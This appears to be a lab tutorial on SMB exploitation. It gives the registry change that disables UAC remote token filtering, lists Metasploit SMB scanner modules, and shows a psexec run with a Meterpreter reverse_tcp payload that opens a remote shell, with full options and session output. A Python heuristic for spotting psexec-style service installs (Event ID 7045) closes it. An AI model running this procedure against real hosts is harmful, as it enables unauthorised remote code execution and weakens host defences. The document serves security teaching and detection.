To test SMB exploitation against a local (non-domain) account in a lab, you first need to change a registry setting on the target and reboot it. By default, UAC remote restrictions strip the administrative token from local accounts that authenticate over the network, so psexec-style execution fails even with valid local administrator credentials. Setting LocalAccountTokenFilterPolicy to 1 disables that filtering; the default of 0 is what you want on any host outside the lab. Save the following as a .reg file and import it:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"LocalAccountTokenFilterPolicy"=dword:00000001
Alternatively, run cmd or PowerShell as administrator and execute (the /f switch overwrites an existing value without prompting):
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
The following Metasploit auxiliary modules are useful for enumerating Windows SMB services before exploitation (tab completion in msfconsole lists them):
msf > use auxiliary/scanner/smb/
use auxiliary/scanner/smb/pipe_auditor
use auxiliary/scanner/smb/pipe_dcerpc_auditor
use auxiliary/scanner/smb/psexec_loggedin_users
use auxiliary/scanner/smb/smb2
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_enumusers_domain
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/smb_lookupsid
use auxiliary/scanner/smb/smb_uninit_cred
use auxiliary/scanner/smb/smb_version
The exploit/windows/smb/psexec module with a Meterpreter payload will be used for the demo.
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOST                 192.168.1.101    yes       The target address
   RPORT                 445              yes       Set the SMB service port
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             WORKGROUP        no        The Windows domain to use for authentication
   SMBPass               password         no        The password for the specified username
   SMBUser               nfs              no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.108    yes       The listen address
   LPORT     8080             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf exploit(psexec) > run
[*] Started reverse handler on 192.168.1.108:8080
[*] Connecting to the server...
[*] Authenticating to 192.168.1.101:445|WORKGROUP as user 'nfs'...
[*] Uploading payload...
[*] Created \DMiyfhpP.exe...
[+] 192.168.1.101:445 - Service started successfully...
[*] Deleting \DMiyfhpP.exe...
[*] Sending stage (885806 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.108:8080 -> 192.168.1.101:1079) at 2015-08-15 04:46:06 +0000
meterpreter > sysinfo
Computer : SECLAB
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
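The session output above shows the footprint psexec leaves on the target: a randomly named .exe is written to the ADMIN$ share root (the system root), registered and started as a service, then deleted. Windows records the service registration as Event ID 7045 in the System log, which is where a defender can catch it. The following is an added example, not part of the original post or of Metasploit; it runs a simple triage heuristic over constructed 7045-style records (the field names and sample values are assumptions shaped like the real event, not real logs).

```python
import re

# Constructed sample records shaped like Service Control Manager events
# (Event ID 7045 = "A service was installed in the system"). Not real logs.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "NpqxMkJc",
     "ImagePath": r"%SYSTEMROOT%\DMiyfhpP.exe",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "ExampleBackupAgent",
     "ImagePath": r"C:\Program Files\Example\backupagent.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"EventID": 7036, "ServiceName": "Spooler", "ImagePath": "",
     "StartType": "", "AccountName": ""},
]

# Binary dropped straight into the system root (the ADMIN$ share root) with an
# all-letter, random-looking name, like the DMiyfhpP.exe in the session above.
SYSROOT_RANDOM_EXE = re.compile(
    r"^(?:%SYSTEMROOT%|C:\\Windows)\\[A-Za-z]{6,16}\.exe$", re.IGNORECASE)


def assess_service_install(event: dict) -> list:
    """Return the reasons a 7045 record looks like a psexec-style service
    install (empty list = nothing notable). Heuristic triage aid only."""
    if event.get("EventID") != 7045:
        return []
    reasons = []
    if SYSROOT_RANDOM_EXE.match(event.get("ImagePath", "")):
        reasons.append("service binary is a random-looking .exe in the system root")
    if event.get("StartType") == "demand start" and event.get("AccountName") == "LocalSystem":
        reasons.append("demand-start service running as LocalSystem")
    return reasons


def find_suspicious_installs(events) -> list:
    """Reduce a list of records to (ServiceName, reasons) pairs for those where
    the strong indicator (binary in the system root) fired."""
    hits = []
    for ev in events:
        reasons = assess_service_install(ev)
        if any(r.startswith("service binary") for r in reasons):
            hits.append((ev["ServiceName"], reasons))
    return hits


if __name__ == "__main__":
    for name, reasons in find_suspicious_installs(SAMPLE_EVENTS):
        print("[!] " + name + ": " + "; ".join(reasons))
```

Pair this with an audit of LocalAccountTokenFilterPolicy on your hosts: the value should be absent or 0 anywhere that is not a deliberate lab target.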
References
https://github.com/rapid7/metasploit-framework/wiki/What-does-my-Rex::Proto::SMB-Error-mean%3F